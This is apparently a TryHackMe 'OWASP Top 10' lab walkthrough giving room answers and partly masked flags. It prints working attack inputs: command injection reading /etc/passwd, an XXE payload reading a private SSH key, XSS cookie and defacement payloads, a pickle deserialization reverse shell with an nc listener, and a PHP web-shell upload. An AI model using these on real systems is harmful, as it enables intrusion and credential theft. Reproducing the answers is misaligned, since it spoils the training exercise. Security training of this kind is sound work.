Owasp Top 10

Room Link: https://tryhackme.com/r/room/owasptop10

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Badges: https://tryhackme.com/ZishanAdThandar/badges/owasp-10


  1. sqlite3
  2. Cracktation.net
  3. Browser Debugging Tools (CTRL+SHIFT+I)
  4. Browser Source Code Viewer (CTRL+U)


  1. Join the machine
  2. Read Instructions and click on Complete.

    Accessing machines

  3. Goto Access and get ovpn file to connect https://tryhackme.com/access
  4. Or, Start attackbox for testing.

    [Severity 1] Injection

  5. Read carefully this section and click on Complete.

    [Severity 1] OS Command Injection

  6. Read this section and mentioned article, then click on Complete.

    [Severity 1] Command Injection Practical

  7. Start Machine and get Target IP from “Target Machine Information”. Now, open http://machine_ip/evilshell.php.
  8. Now, type commands and submit. You can see output below.
  9. Question What strange text file is in the website root directory? Answer drpepper.txt. Running ls command will show this strange text file.
  10. Question How many non-root/non-service/non-daemon users are there? Answer 0. Running cat /etc/passwd will show.
  11. Question What user is this app running as? Answer www-data. Used command whoami.
  12. Question What is the user's shell set as? Answer /usr/sbin/nologin. Command used getent passwd www-data or cat /etc/passwd |grep www-data.
  13. Question What version of Ubuntu is running? Answer ``. Command used lsb_release -a.
  14. Question Print out the MOTD. What favorite beverage is shown? Answer DR PEPPER. Used command cat /etc/update-motd.d/00-header.

    [Severity 2] Broken Authentication

  15. Read this section carefully and click on Complete.

    [Severity 2] Broken Authentication Practical

  16. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information” and open http://MACHINE_IP:8888.
  17. Question What is the flag that you found in darren's account? Answer fe860794************74b667. To get flag inside darren’s account, register as “ darren” and login. Here you need to use whitespace before darren’s name.
  18. Test same trick with user arthur and click on Complete.
  19. Question What is the flag that you found in arthur's account? Answer d9ac0f7************75e16e.

    [Severity 3] Sensitive Data Exposure (Introduction)

  20. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  21. Read this section carefully and click on Complete.

    [Severity 3] Sensitive Data Exposure (Supporting Material 1)

  22. Read this section carefully and click on Complete.

    [Severity 3] Sensitive Data Exposure (Supporting Material 2)

  23. Read this section carefully and click on Complete.

    [Severity 3] Sensitive Data Exposure (Challenge)

  24. If we open the machine link and check source, we can get a image link to http://machine_ip/assets/images/lake-taupo.jpg.
  25. Now if we navigate to http://machine_ip/assets directory, there is a sensitive databse file named webapp.db.
  26. Question What is the name of the mentioned directory? Answer /assets.
  27. Question Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? Answer webapp.db. It’s a file inside /assets.
  28. Now Downloding the file and analyzing the file with file webapp.db command shows it’s a sqlite3 file. Now, we can read the db file with sqlite3 webapp.db.
  29. If we use .table command to get table names, we will see there is two table named session and users. We can get column names using PRAGMA table_info(users); command.
     $> sqlite3 webapp.db 
      SQLite version 3.37.2 2022-01-06 13:25:41
      Enter ".help" for usage hints.
     sqlite> .tables
     sessions  users   
     sqlite> PRAGMA table_info(users);
  30. select * from users; will show user’s details inside the table. We can get admin hash there 6eea9b7ef191*******0f6c05ceb.
     sqlite> select * from users;
  31. Question Use the supporting material to access the sensitive data. What is the password hash of the admin user? Answer 6eea9b7ef191*****dd0f6c05ceb.
  32. Question What is the admin's plaintext password? Answer qwe****op. We can crack the hash using CrackStation.
  33. Question Login as the admin. What is the flag? Answer THM{Yzc2Yjd*************diMjdl}. If we goto http://machine_ip/login and login with username admin and the cracked password qw*****iop, it will redirect to http://machine_ip/console/. There we can get the flag.

    [Severity 4] XML External Entity

  34. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  35. Read this section carefully and click on Complete.

    [Severity 4] XML External Entity - eXtensible Markup Language

  36. Read this section carefully and then start answering.
  37. Question Full form of XML Answer eXtensible Markup Language
  38. Question Is it compulsory to have XML prolog in XML documents? Answer No
  39. Question Can we validate XML documents against a schema? Answer Yes
  40. Question How can we specify XML version and encoding in XML document? Answer xml prolog

    [Severity 4] XML External Entity - DTD

  41. Question How do you define a new ELEMENT? Answer !ELEMENT
  42. Question How do you define a ROOT element? Answer !DOCTYPE
  43. Question How do you define a new ENTITY? Answer !ENTITY

    [Severity 4] XML External Entity - XXE Payload

  44. Read this section carefully and click on Complete.

    [Severity 4] XML External Entity - Exploiting

  45. Now open http://machine_ip
  46. Used given payload in last section to print falcon feast and clicked on Complete.
  47. Again used payload from last section to read /etc/passwd and clicked on complete.
  48. Question What is the name of the user in /etc/passwd Answer falcon. We read it from output of last payload.
  49. Now we can use same payload with replacing file from /etc/passwd to ssh file location /home/falcon/.ssh/id_rsa.
  50. Question Where is falcon's SSH key located? Answer /home/falcon/.ssh/id_rsa.
  51. New payload to read SSH file,
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY read SYSTEM '/home/falcon/.ssh/id_rsa'>]>
  52. Question What are the first 18 characters for falcon's private key Answer MIIEogI****CAQEA7b

    [Severity 5] Broken Access Control

  53. Read this section carefully and click on Complete.

    [Severity 5] Broken Access Control (IDOR Challenge)

  54. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  55. Read and understand how IDOR works and click on Complete.
  56. Open http://machine_ip/ and login with username note and password test123, then click on Complete.
  57. Question Look at other users notes. What is the flag? Answer flag{fivef***three}. Got it by changing note id to 0 and visiting link http://machine_ip/note.php?note=0.

    [Severity 6] Security Misconfiguration

  58. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  59. Read this section carefully, deploy the vm and click on Complete.
  60. If we open the machine_ip, we can get a webapp name Pensive Notes. After googling I got default username password in a github repo https://github.com/NinjaJc01/PensiveNotes. Default credential of Pensive Notes is pensive:PensiveNotes.
  61. Question Hack into the webapp, and find the flag! Answer thm{4b95139*******a1f9d672e17}

    [Severity 7] Cross-site Scripting

  62. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  63. Read this section carefully, deploy the vm and click on Complete.
  64. Question Navigate to http://machine_ip in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello". Answer ThereIsMoreToXSSThanYouThink. Used payload <script>alert("Hello")</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(%22Hello%22)%3C/script%3E
  65. Question On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. Answer ReflectiveXss4TheWin. Used payload <script>alert(window.location.hostname)</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(window.location.hostname)%3C/script%3E
  66. Now goto http://machine_ip/stored and create an account.
  67. Question Then add a comment and see if you can insert some of your own HTML. Answer HTML_T4gs. Commented <img> in http://machine_ip/stored.
  68. On the same page, create an alert popup box appear on the page with your document cookies. Answer W3LL_D0N3_LVL2 Payload used <script>alert(document.cookie)</script>
  69. Now used payload to change title from to. Payload used <script>document.querySelector("#thm-title").textContent="I am a hacker"</script>.
  70. Question Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript. Answer websites_can_be_easily_defaced_with_xss

    [Severity 8] Insecure Deserialization

  71. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  72. Read this section carefully.
  73. Question Who developed the Tomcat application? Answer The Apache Software Foundation
  74. Question What type of attack that crashes services can be performed with insecure deserialization? Answer Denial of Service

    [Severity 8] Insecure Deserialization - Objects

  75. Read this section.
  76. Question if a dog was sleeping, would this be: A) A State B) A Behaviour Answer A Behaviour

    [Severity 8] Insecure Deserialization - Deserialization

  77. Read this section.
  78. Question What is the name of the base-2 formatting that data is sent across a network as? Answer binary

    [Severity 8] Insecure Deserialization - Cookies

  79. Read this section carefully.
  80. Question If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be? Answer webapp.com/login/
  81. Question What is the acronym for the web technology that Secure cookies work over? Answer https

    [Severity 8] Insecure Deserialization - Cookies Practical

  82. Open http://machine_ip/register, create a account and login.
  83. Press CTRL+SHIFT+I and goto Storage section to read and edit cookies.
  84. Copy value of sessionId cookie and decode it with base64 decoder. Command to decode base64, echo "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAN2Y1MWRiYWFhZjY2NDYwMzkyNTNiNTlkOTY3NTAwYWVxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" |base64 -d. You will get the first flag.
  85. Question 1st flag (cookie value) Answer THM{good******se64_huh}
  86. Then edit userType cookie value to admin from user and reload the page and it will redirect to the admin page and show the flag.
  87. Question 2nd flag (admin dashboard) Answer THM{heres******in_flag}

    [Severity 8] Insecure Deserialization - Code Execution

  88. Start listner to listen with nc -lvp 4444 command.
  89. Change cookie userType value to user from admin. Open http://machine_ip/myprofile, then click on Exchange on vim and after that feedback. Give feedback.
  90. We need to follow instructions carefully. First we need to change download pickleme.py and “YOUR_TRYHACKME_VPN_IP” with your TryHackMe VPN IP. To get IP of TryHackMe you can use ifconfig tun0 |grep destination |cut -d" " -f10 command. Then run the python script with python3 pickleme.py. Copy the cookie and add a cookie with that value, name it encodedPayload. Reload feedback page. You will get a netcat shell. You can read flag using cat ../flag.txt command.
  91. Question flag.txt Answer 4a69a7***fd68

    [Severity 9] Components With Known Vulnerabilities - Intro

  92. Read Instructions and click on Complete.

    [Severity 9] Components With Known Vulnerabilities - Exploit

  93. Read Instructions and click on Complete.

    [Severity 9] Components With Known Vulnerabilities - Lab

  94. If any machine is running, terminate that machine first. Then Start this Machine. Copy Target IP from “Target Machine Information”.
  95. When we open http://machine_ip, we get link to http://machine_ip/admin.php and projectworlds.in link. After searching bookstore on projectworlds.in, we get this page https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ with default credential username: admin@admin.com password: admin.
  96. After logging into admin panel, we can upload our shell by editing any book. Shell code, <?php system('wc -c /etc/passwd'); ?> in shell.php. After going to edit book, upload shell.php with change button.
  97. Now to find the shell, open location of image. You can find all images in /bootstrap/img directory. Just open the directory in the link, you can get your uploaded shell there, http://machine_ip/bootstrap/img/shell.php. If you open the page, it will compile and execute the code to display character number of /etc/passwd.
  98. Question How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) Answer 1611

    [Severity 10] Insufficient Logging and Monitoring

  99. Read this section carefully.
  100. Question What IP address is the attacker using? Answer We can check lot of unauthorized login from this ip.
  101. Question What kind of attack is being carried out? Answer Bruteforce. As we can see many unatuthorized usernames requested.

    What Next?

  102. Just click Complete. Done!

Author: Zishan Ahamed Thandar